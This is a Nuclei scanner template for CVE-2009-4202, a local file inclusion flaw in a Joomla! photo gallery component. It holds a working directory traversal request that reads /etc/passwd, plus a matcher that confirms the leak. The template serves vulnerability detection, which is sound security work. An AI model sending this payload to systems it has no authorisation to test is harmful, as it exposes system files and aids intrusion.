my-nuclei-templates/CVE-2009-4202.yaml

34 lines
1.0 KiB
YAML

id: CVE-2009-4202
info:
name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- http://www.vupen.com/english/advisories/2009/1494
- https://nvd.nist.gov/vuln/detail/CVE-2009-4202
- http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/
classification:
cve-id: CVE-2009-4202
tags: cve,cve2009,joomla,lfi,photo
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08